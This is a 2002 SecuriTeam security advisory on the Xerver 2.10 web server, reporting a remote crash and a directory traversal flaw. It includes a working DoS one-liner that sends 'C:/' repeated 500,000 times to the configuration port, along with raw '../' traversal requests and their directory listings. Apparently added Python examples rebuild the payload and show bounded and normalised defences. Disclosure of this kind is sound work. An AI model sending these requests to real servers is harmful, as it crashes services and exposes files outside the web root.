[NEWS] Xerver 2.10 Directory Traversal and DoS

From: support@securiteam.com
Date: 03/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 00:30:00 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Xerver 2.10 Directory Traversal and DoS
------------------------------------------------------------------------

SUMMARY

 <http://www.javascript.nu/xerver/> Xerver Free Web Server is a tiny, fast
and free web server that lets you run CGI/Perl scripts on your computer. It
is nevertheless fairly complete: it supports both HTTP/1.1 and HTTP/1.0 and
the GET, POST and HEAD methods.

Xerver v2.10 suffers from a directory traversal vulnerability that allows a
remote user to obtain directory listings from outside the document root, and
from a DoS bug that allows the web server to be crashed remotely.

DETAILS

Vulnerable systems:
Xerver v2.10 for Windows, Linux, BSD, Solaris, and MAC

Port 32123 is usually used for the server's configuration interface. It is
possible to crash the server remotely by sending it a single request whose
path consists of "C:/" repeated a very large number of times (500,000
repetitions, roughly 1.5 MB of request line, in the example below).

Example:
$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" | nc -vvn 127.0.0.1 32123
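The advisory does not say which internal limit the oversized request line exhausts. Whatever it is, a server that bounds the request line before parsing it never processes the payload. The Python below is an added example, not Xerver's code: it rebuilds the bytes the one-liner above pipes into nc and shows a bounded reader rejecting them after buffering only a few KiB. The 8 KiB limit and the function names are assumptions made for the example.

```python
import io

# Request-line cap for the example. 8 KiB is a common server default; the
# figure is an assumption here, not something the advisory states.
MAX_REQUEST_LINE = 8192


class RequestTooLong(ValueError):
    """Raised when the request line exceeds the configured limit."""


def build_dos_request(repeats=500000):
    """Reconstruct the advisory's payload: "GET /" followed by "C:/"
    repeated `repeats` times and a blank line, i.e. the bytes the
    printf/perl one-liner pipes into nc (constructed locally)."""
    return b"GET /" + b"C:/" * repeats + b"\r\n\r\n"


def read_request_line(stream, limit=MAX_REQUEST_LINE):
    """Read one request line, buffering at most `limit` bytes.

    readline(limit + 1) returns after limit + 1 bytes even when no newline
    has been seen, so an oversized path is rejected before the server has
    held more than a few KiB of it in memory."""
    line = stream.readline(limit + 1)
    if len(line) > limit:
        raise RequestTooLong("request line exceeds %d bytes" % limit)
    if not line.endswith(b"\n"):
        raise ValueError("incomplete request line")
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) == 2:
        # HTTP/0.9 "simple request" (no version), the form the DoS
        # one-liner uses.
        method, target = parts
        version = b"HTTP/0.9"
    elif len(parts) == 3:
        method, target, version = parts
    else:
        raise ValueError("malformed request line")
    return (method.decode("ascii"), target.decode("latin-1"),
            version.decode("ascii"))


def probe(raw):
    """Feed raw request bytes to the bounded reader; returns either
    ("ok", method, target, version) or ("rejected", reason)."""
    try:
        return ("ok",) + read_request_line(io.BytesIO(raw))
    except RequestTooLong as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(probe(b"GET /index.html HTTP/1.0\r\n\r\n"))
    print(probe(build_dos_request()))
```

The point of the bounded read is that the decision is made on the first few KiB: the server never allocates the full 1.5 MB path, so neither the parser nor any later path-mapping code sees it.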

A second bug enables any remote user to obtain directory listings from
outside the document root using ordinary web requests that contain "../"
segments.

Example 1:
$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD>
<BODY BGCOLOR=white COLOR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></FONT>
<PRE> <B>File name File size&nbsp; Last modified</B>

Program Files
--------------------------------------------------------------------------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> Program Files</A>
--------------------------------------------------------------------------------

RECYCLER
--------------------------------------------------------------------------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> RECYCLER</A>
--------------------------------------------------------------------------------

WINNT
--------------------------------------------------------------------------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORDER=0> WINNT</A>
--------------------------------------------------------------------------------

[...]

Accessing the following URL:
http://localhost/unix/ALEX/Xerver2.10/../../../

Results in:

Directory Listing for /

    File name File size Last modified

 $unix
 ALEX
 Documents and Settings
 My Downloads
 Program Files
 RECYCLER

[...]

Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP/1.0

The result is:

Directory Listing for /WINNT/system32/

File name File size Last modified
 ../
 AdCache
 CatRoot
 Com
 DTCLog
 DirectX
 GroupPolicy
 Hummbird
 IOSUBSYS
 Macromed
 Microsoft

[...]
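The advisory does not show how Xerver maps a request path onto the filesystem, only that the "../" segments reach the filesystem and walk above the document root. The Python below is an added example, not Xerver's code. It contrasts a mapping that checks the document-root prefix on the raw string (and so lets the operating system apply the ".." segments afterwards) with one that normalises first and only then checks containment. The document root, the request paths and the function names are constructed for the example; the traversal paths are of the same shape as the advisory's but are not its exact URLs.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for the example (not Xerver's layout).
DOCROOT = "/srv/www/htdocs"


def map_path_vulnerable(docroot, url_path):
    """Flawed mapping: decode, glue onto the document root, and check the
    prefix on the raw string. "../" segments survive untouched, so the
    string passes the check while the filesystem later walks above
    docroot. Returns the path that would be handed to the OS, or None."""
    fs_path = docroot + "/" + unquote(url_path).lstrip("/")
    if not fs_path.startswith(docroot + "/"):
        return None
    return fs_path


def os_resolves(fs_path):
    """What the filesystem actually opens for fs_path once ".." segments
    are applied. Backslashes are treated as separators because the
    advisory's target is a Windows host, which accepts both."""
    return posixpath.normpath(fs_path.replace("\\", "/"))


def map_path_safe(docroot, url_path):
    """Hardened mapping: decode once, treat backslashes as separators,
    normalise so every ".." is applied before any check, then require the
    result to be the document root itself or a descendant of it.
    Returns None when the request escapes the document root."""
    decoded = unquote(url_path).replace("\\", "/")
    fs_path = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    if fs_path != docroot and not fs_path.startswith(docroot + "/"):
        return None
    return fs_path


def compare(url_path, docroot=DOCROOT):
    """Run both mappings on one request path.
    Returns (what the vulnerable mapping ends up opening, safe result)."""
    raw = map_path_vulnerable(docroot, url_path)
    return (os_resolves(raw) if raw is not None else None,
            map_path_safe(docroot, url_path))


if __name__ == "__main__":
    # Constructed request paths: plain, percent-encoded and backslash forms.
    for p in ("/index.html",
              "/Xerver2.10/../../../WINNT/system32/",
              "/Xerver2.10/..%2f..%2f..%2fWINNT/system32/",
              "/Xerver2.10\\..\\..\\..\\WINNT\\system32\\"):
        print("%-45s vulnerable opens %-22s safe -> %s" % ((p,) + compare(p)))
```

The normalisation here is purely lexical; a real server should additionally resolve the candidate with os.path.realpath so that a symlink inside the document root cannot point back out of it, and should decode the URL exactly once so that double-encoded segments are not silently accepted on a second pass.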

Vendor Response:
The vendor was notified.

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


